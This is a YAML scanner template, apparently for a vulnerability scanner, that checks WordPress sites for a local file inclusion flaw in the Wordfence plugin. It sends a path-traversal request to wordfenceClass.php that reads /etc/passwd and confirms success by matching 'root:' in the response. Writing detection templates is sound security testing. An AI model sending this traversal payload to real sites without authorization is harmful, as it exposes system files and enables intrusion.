id: wordpress-wordfence-lfi
info:
  name: Wordpress Wordfence LFI
  risk: High
  confidence: Certain

params:
  - root: '{{.BaseURL}}'

replicate:
  prefixes: 'blog, news, docs'

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", 'root:') && StringSearch("response", 'bin:x:')

references:
  - link: https://www.exploit-db.com/exploits/48061